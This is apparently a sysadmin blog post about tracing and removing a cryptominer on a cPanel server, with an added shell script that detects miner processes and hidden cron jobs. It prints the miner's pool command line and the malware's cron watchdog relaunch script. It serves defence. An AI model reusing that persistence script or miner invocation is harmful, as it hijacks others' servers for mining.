Recently one of the servers under my control was infected with mining software. It caused unnecessary load and wasted server resources.

Since the server runs cPanel, I had to use WHM to track down the source. I checked WHM's ‘Process Manager’ and ‘Daily Process Log’ and found an entry like this:

impxxxx impxxxxketing.com 98.5 -bash -a cryptonight -o stratum+tcp://xx.xx.xx.xx:14444 -u 4AmprS3UsK28LE9pHnt9TXDZygXoVtnQ6eFkD5ghP7TwPZ7tKkhQJn1Z3SUCbmw7xcA8F6pnQBpEzfQ2BGdTXo6BEs7MFHZ -p x

I used ‘Process Manager’ to kill the PID that was running the process.

I then checked the user's cPanel account and found a strange cron job pointing to a strange path, e.g.:

/home/impxxxx/public_html/nrxxxxment/includes/.qts/upd

So I read the content of the file with the cat command:

[root@<hostname> ~]# cat /home/impxxxx/public_html/nrxxxxment/includes/.qts/upd
#!/bin/sh
if test -r /home/impxxxx/public_html/nrxxxxment/includes/.qts/bash.pid; then
pid=$(cat /home/impxxxx/public_html/nrxxxxment/includes/.qts/bash.pid)
if $(kill -CHLD $pid >/dev/null 2>&1)
then
exit 0
fi
fi
cd /home/impxxxx/public_html/nrxxxxment/includes/.qts
./r &>/dev/null

The script is a watchdog: if bash.pid exists and the process it names is still alive (the kill -CHLD succeeds), it exits; otherwise it changes into the directory and relaunches ./r. Next I went into the folder to see what was inside:

[root@<hostname> ~]# cd /home/impxxxx/public_html/nrxxxxment/includes/.qts/
[root@<hostname> .qts]# ls
a bash.pid cron.d dir.dir f g m p r s t upd x

The existence of bash.pid confirms that the miner was being launched from that path.

I deleted the folder and removed the cron job, and the mining stopped.

[root@<hostname> .qts]# cd ..
[root@<hostname> includes]# rm -rfv .qts
removed ‘.qts/f’
removed ‘.qts/x’
removed ‘.qts/cron.d’
removed ‘.qts/t’
removed ‘.qts/s’
removed ‘.qts/p’
removed ‘.qts/dir.dir’
removed ‘.qts/bash.pid’
removed ‘.qts/a’
removed ‘.qts/upd’
removed ‘.qts/g’
removed ‘.qts/m’
removed ‘.qts/r’
removed directory: ‘.qts’
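The steps above were done by hand in WHM and at the shell. The script below is an added example, not code from the original post, that turns the two indicators found here into a repeatable check: a process line carrying a stratum pool URL or the cryptonight flag, and a cron entry whose command runs from a hidden directory under public_html. The ps and crontab samples, the 203.0.113.10 pool address and the wallet string are constructed for the example; the matching patterns are my own and go slightly beyond the post by also accepting the TLS form stratum+ssl.

```shell
#!/bin/sh
# Added example (not from the original post): scan ps output and crontab lines
# for the miner indicators the post found by hand. All sample data is constructed.

# Constructed sample of `ps -eo user,pcpu,args --sort=-pcpu` output. The pool IP
# is from the TEST-NET-3 documentation range; the wallet is a placeholder.
SAMPLE_PS='USER     %CPU COMMAND
impxxxx  98.5 -bash -a cryptonight -o stratum+tcp://203.0.113.10:14444 -u WALLET_PLACEHOLDER -p x
mysql     2.1 /usr/sbin/mysqld
nobody    0.3 /usr/local/apache/bin/httpd -k start
impxxxx   0.0 /usr/local/bin/php /home/impxxxx/public_html/index.php'

# Constructed sample of `crontab -l -u impxxxx` output for the affected account.
# The second entry mirrors the post's cron job; the last one is commented out.
SAMPLE_CRON='MAILTO=""
*/5 * * * * /home/impxxxx/public_html/nrxxxxment/includes/.qts/upd >/dev/null 2>&1
0 3 * * * /usr/local/bin/php /home/impxxxx/public_html/cron.php
# */1 * * * * /home/impxxxx/public_html/.old/run'

# Print process lines carrying a mining-pool indicator: a stratum pool URL
# (stratum+tcp as seen in the post, or the TLS form stratum+ssl) or the
# cryptonight algorithm name.
find_miner_processes() {
    printf '%s\n' "$1" | grep -E -i 'stratum\+(tcp|ssl)://|cryptonight'
}

# Print non-comment cron entries whose command path passes through a hidden
# directory (a component beginning with ".") below public_html, the pattern
# the post's .qts directory followed. Legitimate cron.php-style jobs do not match.
find_hidden_cron_paths() {
    printf '%s\n' "$1" | grep -E '^[^#].*public_html(/[^/ ]+)*/\.[^/ ]+/'
}

# Total number of findings across both checks. Non-zero means follow the
# post's procedure: kill the PID, inspect the cron target, remove it.
count_findings() {
    procs=$(find_miner_processes "$1" | grep -c .)
    crons=$(find_hidden_cron_paths "$2" | grep -c .)
    echo $((procs + crons))
}

echo "== processes with mining indicators =="
find_miner_processes "$SAMPLE_PS"
echo "== cron entries running from hidden public_html directories =="
find_hidden_cron_paths "$SAMPLE_CRON"
echo "findings: $(count_findings "$SAMPLE_PS" "$SAMPLE_CRON")"
```

On a live cPanel box the same functions can be fed the real output of `ps -eo user,pcpu,args --sort=-pcpu` and of `crontab -l -u <account>` for each account instead of the constructed samples; a hit in the cron check points at the directory to inspect, and the bash.pid file inside it names the PID to kill.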